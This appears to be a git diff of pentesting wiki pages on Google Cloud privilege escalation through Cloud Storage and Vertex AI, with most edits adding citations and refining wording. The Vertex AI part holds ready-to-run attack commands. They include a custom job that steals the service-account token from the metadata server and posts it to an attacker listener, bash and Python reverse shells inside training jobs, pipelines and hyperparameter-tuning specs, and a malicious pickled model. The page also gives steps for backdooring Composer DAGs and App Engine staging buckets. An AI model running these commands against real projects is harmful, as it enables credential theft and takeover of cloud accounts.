+This permission allows you to **download files stored inside Cloud Storage**.<sup>[[2]](#references)</sup> This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some GCP services stores their information in buckets:
 
-- **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
-- **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
+- **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.<sup>[[6]](#references)[[8]](#references)</sup>
+- **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.<sup>[[15]](#references)</sup>
 
 ### `storage.objects.setIamPolicy`
 
-You can give you permission to **abuse any of the previous scenarios of this section**.
+You can give you permission to **abuse any of the previous scenarios of this section**.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Add binding
@@ -53,7 +51,7 @@ POLICY
 
 ### **`storage.buckets.setIamPolicy`**
 
-For an example on how to modify permissions with this permission check this page:
+For an example on how to modify permissions with this permission check this page:<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Add binding
@@ -91,7 +89,7 @@ POLICY
 
 ### `storage.hmacKeys.create`
 
-Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
+Cloud Storage's interoperability feature supports **HMAC authentication** for cross-cloud workflows such as AWS S3. An attacker who can create a key for a more privileged Service Account can use that account's Cloud Storage permissions. User-account HMAC keys are managed through the web console and their secrets remain viewable there; a Service Account key exposes its secret only at creation, while its metadata can be listed later. This makes it important to save the service-account secret immediately.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```bash
 # Create key
@@ -123,58 +121,71 @@ gsutil ls gs://[BUCKET_NAME]
 gcloud config set pass_credentials_to_gsutil true
 ```
 
-Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
+Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).<sup>[[5]](#references)</sup>
 
 ### `storage.objects.create`, `storage.objects.delete` = Storage Write permissions
 
-In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object_permissions), you need also `storage.objects.delete` to **modify** an existent object.
+In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object_permissions), you need also `storage.objects.delete` to **modify** an existent object.<sup>[[2]](#references)</sup>
 
 A very **common exploitation** of buckets where you can write in cloud is in case the **bucket is saving web server files**, you might be able to **store new code** that will be used by the web application.
 
 ### Composer
 
-**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
+**Composer** is **Apache Airflow** managed inside GCP.<sup>[[6]](#references)</sup> It has several interesting features:
 
-- It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
-- All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+- In the legacy Composer architecture, it runs inside a managed **GKE cluster**, and Composer executes DAGs on behalf of the environment's **service account**; code in a DAG therefore runs with that identity's permissions.<sup>[[6]](#references)[[7]](#references)</sup>
+- The environment bucket stores **DAG code**, plugins, and data and synchronizes them to Airflow components. If an attacker has read and write permissions over it, they could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the Composer environment gets the backdoored version from storage.<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
-**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)<sup>[[9]](#references)</sup>
 
 ### Cloud Functions
 
-- Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**.
+- In the Cloud Functions/Cloud Run functions deployment flow, source code is stored in Cloud Storage and Cloud Build automatically builds a container from it. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code** when the attacker can write the relevant source or upload bucket.<sup>[[10]](#references)[[11]](#references)</sup>
 
-**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)<sup>[[11]](#references)</sup>
 
 ### App Engine
 
-AppEngine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Inside this bucket, it's possible to find a folder called `ae` that will contain a folder per version of the AppEngine app and inside these folders it'll be possible to find the `manifest.json` file. This file contains a json with all the files that must be used to create the specific version. Moreover, it's possible to find the **real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file.**
+AppEngine versions stage deployment data inside a bucket with the format `staging.<project-id>.appspot.com`.<sup>[[12]](#references)[[13]](#references)</sup> Inside this bucket, it's possible to find a folder called `ae` that will contain a folder per version of the AppEngine app and inside these folders it'll be possible to find the `manifest.json` file. This file contains a JSON with all the files that must be used to create the specific version. Moreover, it's possible to find the **real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file.**<sup>[[13]](#references)</sup>
 
-_Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name appspot.com._
+_Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name appspot.com._<sup>[[13]](#references)</sup>
 
-However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.
+However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.<sup>[[12]](#references)[[13]](#references)</sup>
 
-The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the `staging.<project-id>.appspot.com` bucket:
+The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the `staging.<project-id>.appspot.com` bucket:<sup>[[13]](#references)</sup>
 
-- Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one.
-- Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it.
-- Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it.
+- Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one.<sup>[[13]](#references)</sup>
+- Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it.<sup>[[13]](#references)</sup>
+- Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it.<sup>[[13]](#references)</sup>
 
-**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-AppEngine**](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-AppEngine**](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)<sup>[[13]](#references)</sup>
 
 ### GCR
 
-- **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**
-  - The bucket used by GCR will have an URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
+- **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**<sup>[[15]](#references)</sup>
+  - The bucket used by GCR will have an URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).<sup>[[14]](#references)</sup>
 
 > [!TIP]
-> This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets.
+> This service is deprecated and writing to Container Registry is unavailable, so this bucket-based attack no longer applies to new deployments. Artifact Registry, the recommended replacement, does't store images in project Cloud Storage buckets.<sup>[[15]](#references)</sup>
 
-## **References**
+## References
 
-- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [1] [Privilege Escalation in Google Cloud Platform – Part 2 (Non-IAM) | Rhino Security Labs](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [2] [IAM permissions for Cloud Storage](https://cloud.google.com/storage/docs/access-control/iam-permissions)
+- [3] [Set and manage IAM policies on buckets](https://cloud.google.com/storage/docs/access-control/using-iam-permissions)
+- [4] [HMAC keys | Cloud Storage](https://cloud.google.com/storage/docs/authentication/hmackeys)
+- [5] [Cloud Storage HMAC key exploit script](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py)
+- [6] [Environment architecture | Cloud Composer (Gen 1)](https://cloud.google.com/composer/docs/composer-1/environment-architecture)
+- [7] [Create Cloud Composer environments](https://cloud.google.com/composer/docs/composer-3/create-environments)
+- [8] [Data stored in Cloud Storage | Cloud Composer](https://cloud.google.com/composer/docs/composer-3/cloud-storage)
+- [9] [Monitor-Backdoor-Composer-DAGs](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
+- [10] [Build process overview | Cloud Run functions](https://cloud.google.com/functions/docs/building)
+- [11] [Monitor-Backdoor-Cloud-Functions](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
+- [12] [Use Cloud Storage | App Engine standard environment](https://cloud.google.com/appengine/docs/standard/using-cloud-storage)
+- [13] [Monitor-Backdoor-AppEngine](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
+- [14] [Push and pull images | Container Registry](https://cloud.google.com/container-registry/docs/pushing-and-pulling)
+- [15] [Transition from Container Registry | Artifact Registry](https://cloud.google.com/artifact-registry/docs/transition/transition-from-gcr)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Vertex AI Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Vertex AI
 
 For more information about Vertex AI check:
@@ -10,7 +8,7 @@ For more information about Vertex AI check:
 ../gcp-services/gcp-vertex-ai-enum.md
 {{#endref}}
 
-For **Agent Engine / Reasoning Engine** post-exploitation paths using the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting into consumer / producer / tenant resources, check:
+For **Agent Engine / Reasoning Engine** post-exploitation paths using the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting into consumer / producer / tenant resources, check: <sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 {{#ref}}
 ../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
@@ -18,38 +16,37 @@ For **Agent Engine / Reasoning Engine** post-exploitation paths using the runtim
 
 ### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
 
-With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can **execute arbitrary code with elevated privileges**.
+With `aiplatform.customJobs.create` and `iam.serviceAccounts.actAs` on a target service account, an attacker can submit a custom job that executes code as that service account. The resulting impact is the target service account's effective permissions, subject to the project's other controls. <sup>[[6]](#references)[[7]](#references)</sup>
 
-This works by creating a custom training job that runs attacker-controlled code (either a custom container or Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account's OAuth access token.
+Custom jobs support attacker-controlled training code in a custom container or package, and the `--service-account` flag selects the runtime identity. Training workloads run on Google-managed infrastructure; when the runtime can reach the metadata server, code can request the attached identity's access token. <sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
-**Impact**: Full privilege escalation to the target service account's permissions.
+Replace `<supported-training-image-uri>` with a currently supported image that contains the tools used by the selected command (for example, `sh`, `bash`, or `curl`).
+
+**Impact**: Privilege escalation to whatever the target service account can access.
 
 <details>
 
-<summary>Create custom job with reverse shell</summary>
+<summary>Create custom job with token exfiltration or reverse shell</summary>
 
 ```bash
-# Method 1: Reverse shell to attacker-controlled server (most direct access)
+# Method 1: Exfiltrate the runtime token to an attacker-controlled listener
 gcloud ai custom-jobs create \
   --region=<region> \
-  --display-name=revshell-job \
-  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
+  --display-name=token-exfil-job \
+  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=<supported-training-image-uri> \
   --command=sh \
-  --args=-c,"curl http://attacker.com" \
+  --args=-c,"TOKEN=\$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token); curl --data-binary \"\$TOKEN\" http://YOUR-IP:4444/" \
   --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
 
-# On your attacker machine, start a listener first:
-# nc -lvnp 4444
-# Once connected, you can extract the token with:
-# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+# On your attacker machine, start an HTTP listener first (for example, nc -lvnp 4444).
 
-# Method 2: Python reverse shell (if bash reverse shell is blocked)
+# Method 2: Bash reverse shell (when the selected image includes bash)
 gcloud ai custom-jobs create \
   --region=<region> \
   --display-name=revshell-job \
-  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
+  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=<supported-training-image-uri> \
   --command=sh \
-  --args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
+  --args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
   --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
 ```
 
@@ -64,7 +61,7 @@ gcloud ai custom-jobs create \
 gcloud ai custom-jobs create \
   --region=<region> \
   --display-name=token-exfil-job \
-  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
+  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=<supported-training-image-uri> \
   --command=sh \
   --args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
   --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
@@ -78,18 +75,18 @@ gcloud ai custom-jobs stream-logs <job-id> --region=<region>
 
 ### `aiplatform.models.upload`, `aiplatform.models.get`
 
-This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through and endpoint deployment or batch prediction job.
+This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through an endpoint deployment or batch prediction job.
 
 > [!NOTE]
-> To perform this attack it's needed to have a world readable GCS bucket or create a new one to upload the model artifacts.
+> The artifact URI must be readable by the Vertex AI operation and writable by the operator uploading the model. A bucket does not need to be world-readable or world-writable; use a dedicated location with the minimum required IAM grants.
 
 <details>
 
 <summary>Upload malicious pickled model with reverse shell</summary>
 
 ```bash
-# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
-# Create malicious sklearn model that executes reverse shell when loaded
+# Method 1: Upload malicious pickled model (only if the serving image unpickles it)
+# Create a pickle payload that executes when an application loads it
 cat > create_malicious_model.py <<'EOF'
 import pickle
 
@@ -109,12 +106,12 @@ python3 create_malicious_model.py
 # Upload to GCS
 gsutil cp model.pkl gs://your-bucket/malicious-model/
 
-# Upload model (reverse shell executes when endpoint loads it during deployment)
+# Upload model; execution depends on the selected serving image deserializing model.pkl
 gcloud ai models upload \
   --region=<region> \
   --artifact-uri=gs://your-bucket/malicious-model/ \
   --display-name=malicious-sklearn \
-  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
+  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-6:latest
 
 # On attacker: nc -lvnp 4444 (shell connects when deployment starts)
 ```
@@ -126,7 +123,7 @@ gcloud ai models upload \
 <summary>Upload model with container reverse shell</summary>
 
 ```bash
-# Method 2 using --container-args to run a persistent reverse shell
+# Method 2: use container arguments to run attacker-controlled startup code
 
 # Generate a fake model we need in a storage bucket in order to fake-run it later
 python3 -c '
@@ -142,9 +139,9 @@ gcloud ai models upload \
   --region=<region> \
   --artifact-uri=gs://any-bucket/dummy-path/ \
   --display-name=revshell-model \
-  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
+  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-6:latest \
   --container-command=sh \
-  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
+  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1) & python3 -m http.server 8080" \
   --container-health-route=/ \
   --container-predict-route=/predict \
   --container-ports=8080
@@ -157,12 +154,16 @@ gcloud ai models upload \
 </details>
 
 > [!DANGER]
-> After uploading the malicious model an attacker could wait for someone to use the model, or to launch the model him self via and endpoint deployment or batch prediction job.
+> Pickle is executable by design, but a pickle payload only runs when the selected prediction image actually deserializes that artifact. A custom container gives more deterministic startup behavior; in either case, an endpoint or batch job still has to load the model before the payload runs. <sup>[[11]](#references)[[12]](#references)</sup>
+
+The custom-container image must also satisfy Vertex AI's health and prediction contract. A container that only opens a shell may fail health checks or deployment even if its startup code runs, so validate the image behavior in the target environment. The currently supported scikit-learn inference images and their artifact requirements should be checked before relying on the pickle path. <sup>[[11]](#references)[[21]](#references)</sup>
 
 
-#### `iam.serviceAccounts.actAs`, ( `aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get` ) or ( `aiplatform.endpoints.setIamPolicy` )
+#### `iam.serviceAccounts.actAs`, `aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`
 
-If you have permissions to create and deploy models to endpoints, or modify endpoint IAM policies, you can leverage uploaded malicious models in the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint all you need to do is:
+If you can create an endpoint and deploy a model to it, you can trigger an uploaded malicious model under a selected service account. The endpoint IAM policy is a separate access-control mechanism: `aiplatform.endpoints.setIamPolicy` changes who can access the endpoint, but does not deploy a model or select its runtime service account. <sup>[[6]](#references)[[8]](#references)</sup>
+
+To trigger one of the previously uploaded malicious models via an endpoint:
 
 <details>
 
@@ -189,9 +190,9 @@ gcloud ai endpoints deploy-model <endpoint-id> \
 
 #### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
 
-If you have permissions to create a **batch prediction jobs** and run it with a service account you can access the metadata service. The malicious code executes from a **custom prediction container** or **malicious model** during the batch prediction process.
+If you can create a **batch prediction job** and attach a service account, the prediction container or model may execute code in a runtime that can reach the metadata service. For batch inference, Vertex AI still uses its service agent to access Cloud Storage and BigQuery even when a custom service account is configured, so validate both identities' permissions in the target project. <sup>[[6]](#references)[[8]](#references)[[9]](#references)</sup>
 
-**Note**: Batch prediction jobs can only be created via REST API or Python SDK (no gcloud CLI support).
+**Note**: The current `gcloud ai` command group has no batch-prediction subcommand; use the REST API or a supported client library. <sup>[[20]](#references)</sup>
 
 > [!NOTE]
 > This attack requires first uploading a malicious model (see `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
@@ -206,9 +207,9 @@ gcloud ai models upload \
   --region=<region> \
   --artifact-uri=gs://your-bucket/dummy-model/ \
   --display-name=batch-revshell-model \
-  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
+  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-6:latest \
   --container-command=sh \
-  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
+  --container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1) & python3 -m http.server 8080" \
   --container-health-route=/ \
   --container-predict-route=/predict \
   --container-ports=8080
@@ -256,10 +257,10 @@ curl -X POST \
 
 ### `aiplatform.models.export`
 
-If you have the **models.export** permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.
+If you have the **models.export** permission, you can export a model's supported artifacts to a Cloud Storage location you control. This can disclose model files and metadata, but model export does not generally copy the original training data; the exact output depends on the model's supported export formats. <sup>[[6]](#references)[[15]](#references)</sup>
 
 > [!NOTE]
-> To perform this attack it's needed to have a world readable and writable GCS bucket or create a new one to upload the model artifacts.
+> The destination must be a Cloud Storage location that the export operation can write and the operator can read. Do not make a bucket public merely to satisfy this prerequisite; grant the required access to a dedicated prefix.
 
 <details>
 
@@ -271,13 +272,13 @@ PROJECT="your-project"
 REGION="us-central1"
 MODEL_ID="target-model-id"
 
+# `exportFormatId` is omitted so Vertex AI can select a supported format.
 curl -X POST \
   -H "Authorization: Bearer $(gcloud auth print-access-token)" \
   -H "Content-Type: application/json" \
   "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
   -d '{
     "outputConfig": {
-      "exportFormatId": "custom-trained",
       "artifactDestination": {
         "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
       }
@@ -292,12 +293,12 @@ gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
 
 ### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
 
-Create **ML pipeline jobs** that execute multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.
+Create **ML pipeline jobs** whose containerized steps execute under a selected service account, potentially achieving privilege escalation through code execution.
 
-Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.
+Pipelines orchestrate containerized tasks, so an attacker who can submit a pipeline and attach a service account can place attacker-controlled code in one or more components. <sup>[[8]](#references)[[13]](#references)</sup>
 
 > [!NOTE]
-> You need a world writable GCS bucket to use as the pipeline root.
+> The pipeline root must be a Cloud Storage location writable by the pipeline runtime. Use a dedicated prefix and least-privilege IAM rather than a world-writable bucket.
 
 <details>
 
@@ -355,7 +356,7 @@ pipeline_spec = {
                 "container": {
                     "image": "python:3.11-slim",
                     "command": ["python3"],
-                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
+                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('YOUR-IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"]
                 }
             }
         }
@@ -366,7 +367,7 @@ pipeline_spec = {
 request_body = {
     "displayName": "ml-training-pipeline",
     "runtimeConfig": {
-        "gcsOutputDirectory": "gs://gstorage-name/folder"
+        "gcsOutputDirectory": "gs://<pipeline-root-bucket>/folder"
     },
     "pipelineSpec": pipeline_spec,
     "serviceAccount": TARGET_SA
@@ -410,9 +411,9 @@ else:
 
 Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.
 
-Hyperparameter tuning jobs allow you to run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.
+Hyperparameter tuning jobs run multiple training trials in parallel with different hyperparameter values. By specifying attacker-controlled trial code and associating the trial job with a privileged service account, an attacker can execute code with that identity. The service account belongs in `trialJobSpec.serviceAccount`, and attaching it still requires `iam.serviceAccounts.actAs`. <sup>[[7]](#references)[[8]](#references)[[14]](#references)</sup>
 
-**Impact**: Full privilege escalation to the target service account's permissions.
+**Impact**: Privilege escalation to whatever the target service account can access.
 
 <details>
 
@@ -440,7 +441,7 @@ trialJobSpec:
       containerSpec:
         imageUri: python:3.11-slim
         command: ["python3"]
-        args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
+        args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('YOUR-IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"]
   serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
 EOF
 
@@ -450,7 +451,7 @@ gcloud ai hp-tuning-jobs create \
   --display-name=hyperparameter-optimization \
   --config=hptune-config.yaml
 
-# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
+# On the attacker machine, set up a listener (for example, nc -lvnp 4444).
 # Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
 ```
 
@@ -459,15 +460,15 @@ gcloud ai hp-tuning-jobs create \
 
 ### `aiplatform.datasets.export`
 
-Export **datasets** to exfiltrate training data that may contain sensitive information.
+Export **dataset metadata and annotations** to a Cloud Storage location you control. For image datasets, the export creates JSON Lines files containing metadata, annotations, and the original Cloud Storage URIs; it does not create additional copies of the image data. The security impact therefore depends on what sensitive values are present in the metadata or annotations and on the permissions available for the referenced objects. <sup>[[6]](#references)[[16]](#references)</sup>
 
-**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
+**Note**: The current `gcloud ai` command group does not expose dataset commands, so use the REST API or a supported client library. <sup>[[17]](#references)[[20]](#references)</sup>
 
-Datasets often contain the original training data which may include PII, confidential business data, or other sensitive information that was used to train production models.
+The export is still useful during an assessment because labels, user-supplied metadata, and source URIs can reveal sensitive information or identify higher-value storage targets.
 
 <details>
 
-<summary>Export dataset to exfiltrate training data</summary>
+<summary>Export dataset metadata and annotations</summary>
 
 ```bash
 # Step 1: List available datasets to find a target dataset ID
@@ -478,7 +479,7 @@ curl -s -X GET \
   -H "Authorization: Bearer $(gcloud auth print-access-token)" \
   "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
 
-# Step 2: Export a dataset to your own bucket using REST API
+# Step 2: Export dataset metadata and annotations to a bucket you can read
 DATASET_ID="<target-dataset-id>"
 
 curl -X POST \
@@ -501,16 +502,15 @@ gsutil ls -r gs://your-controlled-bucket/exported-data/
 gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
 
 # Step 4: View the exported data
-# The data will be in JSONL format with references to training data locations
-cat exported-data/*/data-*.jsonl
+# The export is JSONL metadata/annotation data with references to original locations;
+# it does not copy the image objects themselves.
+find exported-data -type f -name '*.jsonl' -print
 
-# The exported data may contain:
+# Depending on the dataset, the exported records may contain:
 # - References to training images/files in GCS buckets
 # - Dataset annotations and labels
-# - PII (Personally Identifiable Information)
-# - Sensitive business data
-# - Internal documents or communications
-# - Credentials or API keys in text data
+# - PII or sensitive business data entered as metadata/annotations
+# - Credentials or API keys only if users put them in metadata/annotations
 ```
 
 </details>
@@ -518,21 +518,21 @@ cat exported-data/*/data-*.jsonl
 
 ### `aiplatform.datasets.import`
 
-Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.
+Import malicious or poisoned data into existing datasets that a later training run may consume, potentially **manipulating model training or introducing backdoors**.
 
-**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
